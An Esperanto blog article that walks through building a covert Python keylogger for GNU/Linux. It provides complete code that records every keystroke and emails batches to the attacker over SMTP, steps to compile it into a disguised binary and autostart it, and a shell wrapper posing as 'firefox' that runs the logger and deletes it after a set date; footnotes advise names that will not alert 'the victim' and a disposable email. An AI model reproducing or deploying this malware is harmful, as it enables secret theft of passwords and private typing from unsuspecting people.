Author: Jorge Maldonado Ventura
Category: Python
Date: 2023-02-02 14:30
Lang: eo
Slug: registrador-de-teclas-keylogger-avanzado-en-python-para-gnu-linux
Tags: klavaroregistrilo, hack, keylogger, macOS, Python, sekureco, Windows
Save_as: klavaroregistrilo-por-GNU-linukso-retpoŝte-sendi-informo-kaj-detruiĝi/index.html
URL: klavaroregistrilo-por-GNU-linukso-retpoŝte-sendi-informo-kaj-detruiĝi/
Title: Klavaroregistrilo (<i lang="en">keylogger</i>) por GNU/Linukso. Retpoŝte sendi informojn kaj detruiĝi
Image: <img src="/wp-content/uploads/2023/02/registrador-de-teclas-con-Python.png" alt="" width="1200" height="675" srcset="/wp-content/uploads/2023/02/registrador-de-teclas-con-Python.png 1200w, /wp-content/uploads/2023/02/registrador-de-teclas-con-Python-600x337.png 600w" sizes="(max-width: 1200px) 100vw, 1200px">

En ĉi tiu artikolo mi montras al vi kiel programi klavaroregistrilon,
kiu sendas mesaĝojn per retpoŝto kaj detruiĝas post difinita dato.

<!-- more -->

Jen la uzota kodo (ni konservos ĝin kiel `compile_docs.py`[^1]):

    :::python
    #!/usr/bin/env python3
    from pynput.keyboard import Key, Listener
    from email.message import EmailMessage
    import smtplib, ssl

    keys = ''

    def on_press(key):
        print(key)
        global keys, count
        keys += str(key)
        print(len(keys),  keys)
        if len(keys) > 190:
            send_email(keys)
            keys = ''

    def send_email(message):
        smtp_server = "CHANGE"
        port = 587
        sender_email = "CHANGE"
        password = "CHANGE"
        receiver_email = sender_email


        em = EmailMessage()
        em.set_content(message)
        em['To'] = receiver_email
        em['From'] = sender_email
        em['Subject'] = 'keylog'

        context = ssl.create_default_context()

        with smtplib.SMTP(smtp_server, port) as s:
            s.ehlo()
            s.starttls(context=context)
            s.ehlo()
            s.login(sender_email, password)
            s.send_message(em)

    with Listener(on_press=on_press) as listener:
        listener.join()

Ni devas anstataŭigi ĉiun `CHANGE` per informo por sendi la retmesaĝon.
Evidente la retadreso uzota devas esti anonima kaj forĵetebla. Esence
per la antaŭa kodo ni sendas retmesaĝon ĉiam, kiam kelkaj klavoj estas
premitaj (kiam ili okupas `190` da signoj).

Nun ni kompilos la kodon per [Nuitka](https://nuitka.net/):

    :::bash
    sudo pip3 install nuitka
    nuikta3 compile_docs.py

La programo devos produkti kompilitan dosieron nomitan `compile_docs.bin`.
Fine vi devas igi, ke la dosiero estu plenumita, kiam vi startigas
retumilon aŭ ŝaltas vian komputilon, [kiel mi klarigis en la antaŭa
artikolo](/eo/baza-klavaroregistrilo-por-GNU-Linukso-ŝteli-pasvortojn-kaj-tajpitajn-informojn/#paŝo2)

Se ni volas igi, ke la programo detruiĝu post difinita tempo, ni povas
krei ion similan al tio ĉi[^2]:

    :::bash
    #!/bin/sh
    DATE=`date +%Y%m%d`
    if [ $DATE > 20230501 ]; then
        rm /usr/share/doc/python3/compile_docs.py
        rm /usr/share/doc/python3/compile_docs.bin
        mv firefox.bin $0  # Forigas ĉi tiun doserion
    else
        python3 nuestro_keylogger.py
    fi

La paŝoj por forigi la klavaroregistrilon povas esti iom malsamaj
dependante de kiel vi kaŝis ĝin.

[^1]: Ĉi tiu estas ekzempla nomo, plej bonas uzi nomon, kiu ne altiros
    la atenton de via viktimo.
[^2]: La dosiero estus konservita kiel `firefox` aŭ similan programon.
